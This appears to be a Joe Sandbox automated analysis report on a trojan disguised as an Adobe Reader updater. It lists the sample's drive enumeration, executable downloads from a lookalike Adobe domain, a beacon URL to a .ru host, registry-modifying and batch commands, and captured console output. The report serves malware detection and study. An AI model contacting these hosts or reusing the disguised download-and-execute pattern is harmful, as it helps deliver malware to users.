Loading ...

Analysis Report CDaNsQ7Rrd.exe

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:74763
Start date:30.08.2018
Start time:10:30:51
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 16m 16s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:CDaNsQ7Rrd.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:401
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal40.troj.evad.winEXE@2202/150@5/2
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, VSSVC.exe, WmiPrvSE.exe, svchost.exe
  • TCP Packets have been reduced to 100
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Detection

StrategyScoreRangeReportingDetection
Threshold400 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exevirustotal: Detection: 8%Perma Link

Spreading:

barindex
Checks for available system drives (often done to infect USB drives)Show sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: z:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: x:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: v:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: t:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: r:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: p:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: n:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: l:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: j:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: h:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: f:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: b:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: y:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: w:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: u:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: s:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: q:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: o:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: m:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: k:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: i:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: g:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: e:
Source: C:\Windows\System32\cmd.exeFile opened: c:
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile opened: a:
Enumerates the file systemShow sources
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user
Source: C:\inst_fold\fp.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Networking:

barindex
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Aug 2018 08:31:39 GMTContent-Type: application/x-msdownloadContent-Length: 13509120Connection: keep-aliveSet-Cookie: __cfduid=d6220ea83677096d27ca5dc8f5806feef1535617898; expires=Fri, 30-Aug-19 08:31:38 GMT; path=/; domain=.adobemacromedia.com; HttpOnlyLast-Modified: Tue, 10 Apr 2018 20:55:20 GMTAccept-Ranges: bytesServer: cloudflareCF-RAY: 4525e6fca7103e9e-ZRHData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /f.php?data=000-000-000-000&id_k=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ca80628.tmweb.ru
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /setup.exe HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: adobemacromedia.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.php?data=000-000-000-000&id_k=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ca80628.tmweb.ru
Found strings which match to known social media urlsShow sources
Source: CDaNsQ7Rrd.exeString found in binary or memory: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s'RichEdit20W[1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmptmpALLUSERS = 1';WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSW
Source: CDaNsQ7Rrd.exeString found in binary or memory: [H%[H6[H.partHEADhttp://www.google.comhttp://www.yahoo.comhttp://www.example.comtin9999.tmpAdvancedInstallerGETwininet.dllFTP Server*/*HTTP/1.0Range: bytes=%u- equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: adobemacromedia.com
Urls found in memory or binary dataShow sources
Source: armstatus.exe.25.drString found in binary or memory: http://ca80628.tmweb.ru
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: CDaNsQ7Rrd.exeString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: CDaNsQ7Rrd.exeString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
Source: armstatus.exe.25.drString found in binary or memory: http://gcc.gnu.org/bugs.html):
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://ocsp.digicert.com0H
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://ocsp.digicert.com0I
Source: CDaNsQ7Rrd.exeString found in binary or memory: http://ocsp.thawte.com0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://s2.symcb.com0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://sv.symcd.com0&
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: CDaNsQ7Rrd.exeString found in binary or memory: http://www.advancedinstaller.com0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://www.symauth.com/cps0(
Source: host6.8_unsigned.msi.26.drString found in binary or memory: http://www.symauth.com/rpa00
Source: host6.8_unsigned.msi.26.drString found in binary or memory: https://d.symcb.com/cps0%
Source: host6.8_unsigned.msi.26.drString found in binary or memory: https://d.symcb.com/rpa0
Source: host6.8_unsigned.msi.26.drString found in binary or memory: https://www.digicert.com/CPS0

DDoS:

barindex
Too many similar processes foundShow sources
Source: tasklist.exeProcess created: 85
Source: timeout.exeProcess created: 94
Source: find.exeProcess created: 87
Source: unknownProcess created: 741
Source: taskkill.exeProcess created: 1041

System Summary:

barindex
Uses regedit.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\regedit.exe regedit /s 'C:\inst_fold\armfix.reg'
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Tasks\{DE4C87A4-56DF-40F2-BF3B-9314F5F8610B}.jobJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$b60
Deletes files inside the Windows folderShow sources
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Tasks\{DE4C87A4-56DF-40F2-BF3B-9314F5F8610B}.job
Enables security privilegesShow sources
Source: C:\Windows\System32\msiexec.exeProcess token adjusted: Security
PE file contains strange resourcesShow sources
Source: CDaNsQ7Rrd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CDaNsQ7Rrd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CDaNsQ7Rrd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CDaNsQ7Rrd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.part.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: setup.exe.part.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7za.dll.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7za.dll.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fp.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fp.exe.23.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\cscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: CDaNsQ7Rrd.exeBinary or memory string: OriginalFileNamereaderupd_en_xa_cra_install.exe: vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exeBinary or memory string: OriginalFilenamePrereq.dllF vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exeBinary or memory string: OriginalFilenamelzmaextractor.dllF vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exeBinary or memory string: OriginalFileNameaipackagechainer.exe vs CDaNsQ7Rrd.exe
Source: CDaNsQ7Rrd.exeBinary or memory string: OriginalFilenameAICustAct.dllF vs CDaNsQ7Rrd.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile read: C:\Users\user\Desktop\CDaNsQ7Rrd.exeJump to behavior
Uses reg.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\System32\reg.exe reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E945283B-758C-4A40-B851-1066D0E49EA8} /f
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: CDaNsQ7Rrd.exeBinary string: IDYESAI_OFFICE_REGOPENAI_ADDIN0.0.0.0Advanced Installer PathSoftware\Caphyon\Advanced Installer\Installation PathSoftware\Caphyon\Advanced InstallerAI_OFN_FILEPATHAI_OFN_DLG_TITLEAI_OFN_FILTERSAI_OFN_FLAGSAI_OFN_DEF_EXTAI_OFN_DIRECTORYAI_OFN_FILENAMEAI_MINJREVERSIONAI_PACKAGE_TYPEx64Intel64Software\JavaSoft\Java Runtime Environment\AI_JREVERFOUNDAI_MINJDKVERSIONSoftware\JavaSoft\Java Development Kit\AI_JDKVERFOUNDAI_COMBOBOX_DATAAI_LISTBOX_DATA\\\esc1\#\esc2\|\esc3\\esc0\esc0\\esc2#\esc3|\esc1\ERROR%sERROR_NO_VALUEERROR_DUPLICATE_ITEM%s: %sSUCCESS#\#|\|\\\%s%c%s%c%s%s%c%sSELECT * FROM `Control` WHERE `Type` = 'Bitmap'AI_SYSTEM_DPIAI_SYSTEM_DPI_SCALEAI_BITMAP_DISPLAY_MODESELECT `Argument`, `Condition` FROM `ControlEvent` WHERE `Dialog_` = 'ExitDialog' AND `Control_` = 'Finish' AND `Event` = 'DoAction' ORDER BY `Ordering`AI_AI_ViewReadmeAI_LaunchAppCTRLS3ALLSELECT `Feature` FROM `Feature`DoActionAddLocalRemoveAddSourceReinstallModeREINSTALLMODEAI_INSTALL_MODE{ED4824AF-DCE4-45A8-81E2-FC7965083634}PublicDocumentsF
Classification labelShow sources
Source: classification engineClassification label: mal40.troj.evad.winEXE@2202/150@5/2
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1Jump to behavior
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeFile created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9546.tmpJump to behavior
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\waitbefore.bat' '
Found command line outputShow sources
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........@..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.............................Ow@..J..!.............d...........,.....dw....
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...|... ........A..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .c.n.t.p.r.o.c.=.0. .......................................<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........A............................S.......S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......%A..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.............................Ow@..J.t".............d...........,.....dw....
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.l.i.s.t.....1A..........................@..J8....).J........8...;.dw...............J....H...
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....|... .......7A..................................@..J8....).J....B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .|. ...|... .......=A..........................l.....S.......S..........1.Q.............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................f.i.n.d.|... .......CA..............................................l.....S....................Q....
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.I. ./.C. .".7.z.a.a...e.x.e.". . ...................................B1.Ql.......&....E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....|... .......OA..........................x.e.". . ...............~1.QX............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.m.p.f.l...t.x.t. .UA..........................". . ...............~1.Qr1.Q\............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......[A.............................w...w....@F.J.........1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........J..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>...............................@..J......Ow@..J.t".............,.....dw....
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...|... ........J...........................`$.<..J.....bNw..\ut.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.p. .p.n.u.m.=. ..J...................................`$.<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................0.<.....|... ........J...................................................1.Q.............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.m.p.f.l...t.x.t. ..J...............................................1.Q"1.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........J..............................@F.J........UF.J.j.Q.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........J..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.............................Ow@..JF.#.............d...........,.....dw....
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...|... ........K...........................`$.<..J.....bNw..\ut.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.a. .c.n.t.p.r.o.c.=.c.n.t.p.r.o.c.+.0. ..............`$.<..J.....bNw21.Q........,....E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........K............................S.,.....S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......#K..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.l.i.s.t...../K..........................@..J8....).J........8...;.dw...............J....p`$.
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....|... .......5K..................................@..J8....).J....B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .|. ...|... .......;K..........................l.....S.......S..........1.Q.............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................f.i.n.d.|... .......AK..............................................l.....S....................Q....
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.I. ./.C. .".a.r.m.s.t.a.l.l...e.x.e.". . ...........................B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....|... .......MK..........................l.l...e.x.e.". . .......~1.QX............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.m.p.f.l...t.x.t. .SK............................e.x.e.". . .......~1.Qr1.Q\............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......YK.............................w...w....@F.J.........1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........S..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>...............................@..J......Ow@..JF.#.............,.....dw....
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...|... ........S...........................`$.<..J.....bNw..\u|.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.p. .p.n.u.m.=. ..S...................................`$.<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................0.<.....|... ........S...................................................1.Q.............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.m.p.f.l...t.x.t. ..S...............................................1.Q"1.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........S..............................@F.J........UF.J.j.Q.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........T..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...|... .......*T...........................`$.<..J.....bNw..\u|.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......6T............................S.,.....S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......ET..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.l.i.s.t.....QT..........................@..J8....).J........8...;.dw...............J....p`$.
Source: C:\Windows\System32\cmd.exeConsole Write: .................... . .....|... .......WT..................................@..J8....).J....B1.Ql............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .|. ...|... .......]T..........................l.....S.......S..........1.Q.............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................f.i.n.d.|... .......cT..............................................l.....S....................Q....
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.I. ./.C. .".r.u.t.s.e.r.v...e.x.e.". . .............................B1.Ql.......,....E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.>.....|... .......oT..........................v...e.x.e.". . .........~1.QX............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.m.p.f.l...t.x.t. .uT..........................e.x.e.". . .........~1.Qr1.Q\............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......{T.............................w...w....@F.J.........1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........[..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...|... ........[...........................`$.<..J.....bNw..\u..............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... ./.p. .p.n.u.m.=. ..\...................................`$.<..J.....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................0.<.....|... ........\...................................................1.Q.............F.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.m.p.f.l...t.x.t. ..\...............................................1.Q"1.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........\..............................@F.J........UF.J.j.Q.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......A\..........................e.f.o.r.e...b.a.t........,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...|... .......M\...........................`$.<..J.....bNw..\u..............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......Y\............................S.,.....S.........@F.J.1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... .......h\..........................e.f.o.r.e...........XX%..,.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...|... .......t\...........................@..............`....bNw21.Q.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ..................../.I. ...|... .......z\......................................`....bNw21.Q61.Q.............<.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................".0.". .N.E.Q. .".0.". .........................|... .......z\..........^1.Qx...........`I.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................p.a.u.s.e... ........\..................................^1.Qx.....S.......S.....................YF.J
Source: C:\Windows\System32\cmd.exeConsole Write: ............................|... ........\..........................@j.Q....B........j.Q.....1.Q....,........E.J....$...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......1f..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.......................X.....Ow@..J..................................dw|...
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....=f..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......Cf......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......If..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........g..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.......................X.....Ow@..J..................................dw|...
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........g.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........g...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........g............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........g..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................C.:.\.i.n.s.t._.f.o.l.d.>.......................b.a.t................:.I......I...............dw|...
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l......g..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d........g......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........g..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d........i..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d........i.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d........i...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d......."i............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......1i..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................t.a.s.k.k.i.l.l.....=i..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: ......................0.........d.......Ci......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......Ii..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......*k..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exeConsole Write: ....................g.o.t.o.....d.......6k.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .l.o.o.p. .d.......<k...............................................bNwv8.I....|........E.J....t...
Source: C:\Windows\System32\cmd.exeConsole Write: ................................d.......Bk............................I.......I.........@F.JV8.I,............E.J........
